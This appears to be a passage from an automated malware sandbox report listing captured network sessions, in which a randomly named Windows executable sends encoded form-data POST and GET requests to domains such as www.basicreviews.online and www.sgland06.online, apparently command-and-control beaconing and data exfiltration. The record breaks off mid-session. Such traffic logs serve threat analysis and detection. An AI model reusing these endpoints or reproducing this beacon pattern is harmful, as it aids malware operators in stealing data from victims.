                                                                                                                                                                              Data Raw: 5a 54 3d 73 4a 2f 62 2f 49 4b 58 52 70 43 6c 31 68 78 44 4d 67 6c 77 68 2f 33 66 39 6e 2f 33 54 36 52 35 52 51 4a 30 4c 52 55 50 67 45 6b 43 54 37 45 35 32 35 2b 79 41 76 43 46 63 6a 55 67 55 56 47 69 71 77 6c 51 55 35 5a 75 32 2b 59 30 76 6b 49 31 35 6a 53 31 68 41 6f 39 63 58 39 70 61 31 33 39 57 65 34 42 66 6d 50 50 74 78 33 36 7a 5a 56 39 2f 57 51 2f 39 2b 71 47 6c 44 6b 79 63 43 31 38 54 42 37 68 71 74 4d 4e 4c 78 66 4a 75 71 49 65 5a 51 56 6a 4f 57 6a 57 57 64 77 38 42 55 34 72 63 37 37 57 63 33 2f 46 38 6f 7a 59 6b 67 62 43 6d 77 41 36 4b 74 79 71 2f 72 74 31 4a 2f 5a 37 58 51 3d 3d
                                                                                                                                                                              Data Ascii: ZT=sJ/b/IKXRpCl1hxDMglwh/3f9n/3T6R5RQJ0LRUPgEkCT7E525+yAvCFcjUgUVGiqwlQU5Zu2+Y0vkI15jS1hAo9cX9pa139We4BfmPPtx36zZV9/WQ/9+qGlDkycC18TB7hqtMNLxfJuqIeZQVjOWjWWdw8BU4rc77Wc3/F8ozYkgbCmwA6Ktyq/rt1J/Z7XQ==
                                                                                                                                                                              Oct 30, 2024 08:13:11.589212894 CET1045INHTTP/1.1 302 Found
                                                                                                                                                                              Connection: close
                                                                                                                                                                              content-type: text/html
                                                                                                                                                                              content-length: 771
                                                                                                                                                                              date: Wed, 30 Oct 2024 07:13:11 GMT
                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                              cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                              location: http://www.basicreviews.online/cgi-sys/suspendedpage.cgi
                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              42192.168.2.450049144.76.190.39803804C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 30, 2024 08:13:13.274454117 CET751OUTPOST /3xn5/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.basicreviews.online
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.basicreviews.online
                                                                                                                                                                              Referer: http://www.basicreviews.online/3xn5/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 5a 54 3d 73 4a 2f 62 2f 49 4b 58 52 70 43 6c 36 67 68 44 4f 41 5a 77 31 76 33 59 6a 33 2f 33 5a 61 52 31 52 52 31 30 4c 55 6c 55 67 32 41 43 64 2b 34 35 33 34 2b 79 48 76 43 46 54 44 55 70 61 31 47 39 71 77 70 69 55 38 68 75 32 36 34 30 76 68 73 31 34 55 4f 30 68 51 6f 7a 64 6e 39 72 55 56 33 39 57 65 34 42 66 69 6e 31 74 78 50 36 7a 70 6c 39 74 48 51 77 38 2b 71 46 69 44 6b 79 59 43 31 34 54 42 37 54 71 73 51 33 4c 33 44 4a 75 72 34 65 65 42 56 73 5a 47 6a 55 4c 4e 77 74 49 33 56 54 53 34 57 6e 61 52 79 69 36 59 76 44 6c 6d 57 59 33 42 68 74 59 74 57 5a 69 73 6b 42 45 38 6b 79 4d 64 6a 45 59 67 62 76 30 74 59 5a 6c 6d 6a 45 68 51 41 56 42 6f 59 3d
                                                                                                                                                                              Data Ascii: ZT=sJ/b/IKXRpCl6ghDOAZw1v3Yj3/3ZaR1RR10LUlUg2ACd+4534+yHvCFTDUpa1G9qwpiU8hu2640vhs14UO0hQozdn9rUV39We4Bfin1txP6zpl9tHQw8+qFiDkyYC14TB7TqsQ3L3DJur4eeBVsZGjULNwtI3VTS4WnaRyi6YvDlmWY3BhtYtWZiskBE8kyMdjEYgbv0tYZlmjEhQAVBoY=
                                                                                                                                                                              Oct 30, 2024 08:13:14.199846983 CET1045INHTTP/1.1 302 Found
                                                                                                                                                                              Connection: close
                                                                                                                                                                              content-type: text/html
                                                                                                                                                                              content-length: 771
                                                                                                                                                                              date: Wed, 30 Oct 2024 07:13:13 GMT
                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                              cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                              location: http://www.basicreviews.online/cgi-sys/suspendedpage.cgi
                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              43192.168.2.450050144.76.190.39803804C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 30, 2024 08:13:15.826363087 CET10833OUTPOST /3xn5/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.basicreviews.online
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 10299
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.basicreviews.online
                                                                                                                                                                              Referer: http://www.basicreviews.online/3xn5/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 5a 54 3d 73 4a 2f 62 2f 49 4b 58 52 70 43 6c 36 67 68 44 4f 41 5a 77 31 76 33 59 6a 33 2f 33 5a 61 52 31 52 52 31 30 4c 55 6c 55 67 32 49 43 64 4c 30 35 31 62 57 79 47 76 43 46 4e 7a 55 6b 61 31 47 77 71 77 78 6d 55 38 38 5a 32 34 41 30 73 43 55 31 78 46 4f 30 71 51 6f 7a 59 58 39 6d 61 31 33 53 57 65 70 47 66 6d 44 31 74 78 50 36 7a 72 39 39 39 6d 51 77 78 65 71 47 6c 44 6b 41 63 43 31 51 54 42 7a 70 71 73 56 4b 4c 42 7a 4a 75 4c 6f 65 66 7a 39 73 47 32 6a 53 49 4e 78 77 49 33 5a 4d 53 35 37 59 61 52 76 46 36 61 7a 44 6b 6e 76 67 73 51 46 71 4e 2f 2b 51 2b 62 34 46 41 4d 74 72 55 76 6d 38 64 53 37 55 73 75 34 62 69 6e 61 67 39 43 30 32 55 64 7a 6a 6d 72 67 74 74 71 31 57 62 61 37 59 73 52 5a 71 74 73 69 5a 66 4a 30 54 50 74 41 70 38 49 46 6a 75 77 2f 4b 6a 77 49 42 2f 38 4f 7a 65 4c 59 62 61 39 39 4c 72 76 48 54 79 79 59 35 62 48 31 4b 62 47 54 4f 2b 73 34 79 34 64 6b 72 33 6c 62 66 44 2f 33 50 35 74 42 37 76 47 72 46 48 2b 2b 4a 5a 73 31 49 6d 41 4f 72 46 38 6b 32 53 39 68 34 4c 79 51 4c 59 71 7a [TRUNCATED]
                                                                                                                                                                              Data Ascii: ZT=sJ/b/IKXRpCl6ghDOAZw1v3Yj3/3ZaR1RR10LUlUg2ICdL051bWyGvCFNzUka1GwqwxmU88Z24A0sCU1xFO0qQozYX9ma13SWepGfmD1txP6zr999mQwxeqGlDkAcC1QTBzpqsVKLBzJuLoefz9sG2jSINxwI3ZMS57YaRvF6azDknvgsQFqN/+Q+b4FAMtrUvm8dS7Usu4binag9C02Udzjmrgttq1Wba7YsRZqtsiZfJ0TPtAp8IFjuw/KjwIB/8OzeLYba99LrvHTyyY5bH1KbGTO+s4y4dkr3lbfD/3P5tB7vGrFH++JZs1ImAOrF8k2S9h4LyQLYqz9kxSRtoZQlORAUgKe3EDbOdewEZkyOJLwzdObdCgkNhacafYOSr/GVHnpWf8QYpoNkIDhUjou+sYnLIkbi48UbigHRZUHys++vVJGzNy0q/MZmdUMrVoahNTGW2W6nixdMsk6M7zSnxE1WNKgwLTs2Zy8x5cFnBGuSc2aLk7Yanzk+RuAQW2A5UDfpHgKke8RkM/mDVB0Z5uPWkSeyRGUFIaCYIRuwg9OFswDxY5/S0AnGhrgAhYS2EmgYcDA2lb4cTnGwFfwq7XqHpt/o6Gg786ThG9n85R9VCfIGVBG+s2iCuIZGCLxgEfATvTZlqpHuSFbOfOa5DBQ9Z+Eu14UOpZVXJqfmcjpqCjvUW0U9QKE3OJrR3Awe3RTezmndU6XJZHV+Z+0zNRPlPafYEAYHId1fPWvQXuTrGEgikq5sOIbYHlhDy4p9yrSmzfe3nv7GxfZBEIakA62V+xfkFIxmbJaQIFb6W+3yim5UxC4vzccLeh3flH959ueWfMRCpupWfkUc5ZcjWXvjRD1UCADSaSroGj9ElNAl4yEV3fBPRAF7+XnKmIT5d5aU3ewePi5MsxKx0xKSOow6fJPUq5h3srqkt0E8pY6jMjsi7O1VXEEyMMWdvexEpuCc5ZcT2utpVvHS0sho6btj0QLsgf08lWGMh8rAiLS7 [TRUNCATED]


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              44192.168.2.450051144.76.190.39803804C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 30, 2024 08:13:18.366791964 CET452OUTGET /3xn5/?ZT=hLX784qEA4n55Q1oGw1olOPE1jv2cb5vRwpnfGUpuE0YTY8y9L6/CN63cm0behm+qDJgSuJj8e8DxEJz6zH1lBsEYFc4WGfLLcwXK2bqtXGi64JZ82gh2/U=&mTkD=Gj2Ti2T0g4 HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.basicreviews.online
                                                                                                                                                                              Connection: close
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Oct 30, 2024 08:13:19.209549904 CET1185INHTTP/1.1 302 Found
                                                                                                                                                                              Connection: close
                                                                                                                                                                              content-type: text/html
                                                                                                                                                                              content-length: 771
                                                                                                                                                                              date: Wed, 30 Oct 2024 07:13:19 GMT
                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                              cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                              location: http://www.basicreviews.online/cgi-sys/suspendedpage.cgi?ZT=hLX784qEA4n55Q1oGw1olOPE1jv2cb5vRwpnfGUpuE0YTY8y9L6/CN63cm0behm+qDJgSuJj8e8DxEJz6zH1lBsEYFc4WGfLLcwXK2bqtXGi64JZ82gh2/U=&mTkD=Gj2Ti2T0g4
                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              45192.168.2.45005234.92.128.59803804C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 30, 2024 08:13:24.386512041 CET719OUTPOST /33ib/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.sgland06.online
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.sgland06.online
                                                                                                                                                                              Referer: http://www.sgland06.online/33ib/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 5a 54 3d 4e 61 6d 2f 44 66 57 57 37 50 39 48 61 4b 78 48 30 74 54 44 43 77 6c 4d 72 58 45 43 2f 4d 74 6f 6e 34 6a 68 36 62 31 68 7a 31 70 4a 52 52 47 38 30 6c 63 46 64 4e 41 77 6d 63 46 46 6a 31 74 61 4a 66 74 6c 45 31 4d 34 38 6e 70 33 36 4e 4e 70 79 31 57 54 78 68 6d 6d 64 31 6b 43 74 6a 38 44 30 6a 67 57 34 31 63 32 6f 6b 58 41 44 50 2f 69 70 36 49 6b 6e 38 73 56 70 4c 43 54 4e 36 59 2f 37 49 47 6d 5a 6a 51 35 76 41 31 4e 68 31 31 55 65 71 63 76 6e 35 6c 5a 71 6f 32 6e 64 70 55 46 4c 61 43 32 7a 79 7a 31 6f 42 6e 41 38 59 48 68 6f 33 2b 52 69 49 44 39 76 4d 77 2b 49 6c 66 79 5a 41 3d 3d
                                                                                                                                                                              Data Ascii: ZT=Nam/DfWW7P9HaKxH0tTDCwlMrXEC/Mton4jh6b1hz1pJRRG80lcFdNAwmcFFj1taJftlE1M48np36NNpy1WTxhmmd1kCtj8D0jgW41c2okXADP/ip6Ikn8sVpLCTN6Y/7IGmZjQ5vA1Nh11Ueqcvn5lZqo2ndpUFLaC2zyz1oBnA8YHho3+RiID9vMw+IlfyZA==
                                                                                                                                                                              Oct 30, 2024 08:13:25.346431971 CET833INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:13:25 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cUHwzHeeaK07BdDXGPgYn90TIdEYVBR1SAV6wEUL1lI8%2BYb6S%2BVcop685tmmlSSj0FiGcF0GeDsMYjQOXsPNOMStMs1TtT0VOgf3VxI7t%2FJTq7zBCJ7t08DLuf1CCQQEWTDnbncWcGWNQg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1478&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=739&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                              Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              46192.168.2.45005334.92.128.59803804C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 30, 2024 08:13:26.942014933 CET739OUTPOST /33ib/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.sgland06.online
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.sgland06.online
                                                                                                                                                                              Referer: http://www.sgland06.online/33ib/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 5a 54 3d 4e 61 6d 2f 44 66 57 57 37 50 39 48 62 71 68 48 6e 63 54 44 56 67 6b 2b 6c 33 45 43 78 73 74 73 6e 34 76 68 36 65 56 78 7a 6d 64 4a 49 30 36 38 31 6e 34 46 54 74 41 77 73 38 46 41 74 56 74 52 4a 66 52 44 45 78 4d 34 38 6e 74 33 36 4e 39 70 75 53 36 55 77 78 6d 6b 57 56 6b 41 6e 44 38 44 30 6a 67 57 34 78 30 59 6f 6e 6e 41 43 2f 76 69 76 72 49 6a 35 73 73 57 6a 72 43 54 4a 36 59 37 37 49 47 45 5a 6e 5a 53 76 43 4e 4e 68 33 74 55 65 62 63 73 75 35 6c 66 30 59 32 31 58 4b 35 39 54 62 2f 56 39 6b 72 41 6e 79 4c 42 77 2b 4b 37 35 47 66 47 77 49 6e 4f 79 4c 35 4b 46 6d 69 37 43 4f 32 4b 36 31 59 57 6a 38 38 45 39 5a 4c 35 6b 66 78 56 4a 63 77 3d
                                                                                                                                                                              Data Ascii: ZT=Nam/DfWW7P9HbqhHncTDVgk+l3ECxstsn4vh6eVxzmdJI0681n4FTtAws8FAtVtRJfRDExM48nt36N9puS6UwxmkWVkAnD8D0jgW4x0YonnAC/vivrIj5ssWjrCTJ6Y77IGEZnZSvCNNh3tUebcsu5lf0Y21XK59Tb/V9krAnyLBw+K75GfGwInOyL5KFmi7CO2K61YWj88E9ZL5kfxVJcw=
                                                                                                                                                                              Oct 30, 2024 08:13:28.198921919 CET839INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:13:27 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F1Qp0ukKMEeQgs6o%2BwXck7xNYyZcumSwOAJJD84Cj7dF87XdMaCrjGWrYvj9I1MLqY%2FAvcs4d6H8GJZADfCa8Wq5RxkTIsXxXIQqQWFHDY%2FYEnghqv%2FSdyaSNi5bxCMfdQlmsGO%2FzaVmGw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1814&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=759&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                              Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              47192.168.2.45005434.92.128.59803804C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 30, 2024 08:13:29.499329090 CET10821OUTPOST /33ib/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.sgland06.online
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 10299
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.sgland06.online
                                                                                                                                                                              Referer: http://www.sgland06.online/33ib/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
